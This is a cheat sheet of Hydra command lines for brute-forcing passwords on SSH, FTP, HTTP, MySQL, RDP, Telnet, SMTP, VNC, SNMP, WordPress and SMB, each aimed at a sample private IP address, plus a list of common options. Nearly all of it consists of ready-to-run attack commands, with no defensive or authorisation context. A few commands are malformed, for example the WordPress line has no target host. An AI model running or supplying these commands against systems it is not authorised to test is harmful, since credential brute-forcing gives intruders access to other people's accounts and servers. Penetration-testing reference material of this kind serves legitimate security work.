Brute Forcing SSH
hydra -l root -P passwords.txt ssh://192.168.1.100- -l root: Specifies the username.
- -P passwords.txt: Uses a password list for brute force.
- ssh://192.168.1.100: Target IP and protocol.
Alternative: Using multiple usernames
hydra -L users.txt -P passwords.txt ssh://192.168.1.100
Brute Forcing FTP
hydra -l admin -P passwords.txt ftp://192.168.1.100
- Targets FTP on 192.168.1.100 with a password list.
Alternative: Anonymous Login
hydra -l anonymous -P passwords.txt ftp://192.168.1.100
- Tests if anonymous FTP login is enabled.
Brute Forcing HTTP Login (Basic Auth)
hydra -L users.txt -P passwords.txt http://192.168.1.100 -m /admin
- -m /admin: Specifies the login page.
Brute Forcing MySQL
hydra -L users.txt -P passwords.txt 192.168.1.100 mysql
- Attacks MySQL with a username and password list.
Brute Forcing RDP
hydra -L users.txt -P passwords.txt rdp://192.168.1.100
- Tests Remote Desktop Protocol (RDP).
Brute Forcing Telnet
hydra -l admin -P passwords.txt telnet://192.168.1.100
- Brute forces Telnet login.
Brute Forcing SMTP (Mail Server)
hydra -L users.txt -P passwords.txt smtp://192.168.1.100 -V
- -V: Verbose mode to see each attempt.
Brute Forcing VNC
hydra -P passwords.txt vnc://192.168.1.100
- Targets VNC login with a password list.
Brute Forcing SNMP
hydra -P community.txt snmp://192.168.1.100
- Tests for weak SNMP community strings.
Brute Forcing WordPress
hydra -L users.txt -P passwords.txt http-post-form \
"wp-login.php:log=^USER^&pwd=^PASS^:Invalid username"
- Targets WordPress login forms.
Brute Forcing SMB (Windows File Sharing)
hydra -L users.txt -P passwords.txt smb://192.168.1.100
- Tests weak credentials on SMB.
Common Options
- -l <username>: Single username.
- -L <file>: List of usernames.
- -P <file>: List of passwords.
- -t <number>: Threads 1 -64 More means faster but louder
- -V: Verbose mode (shows each attempt).
- -f: Stops when a valid login is found.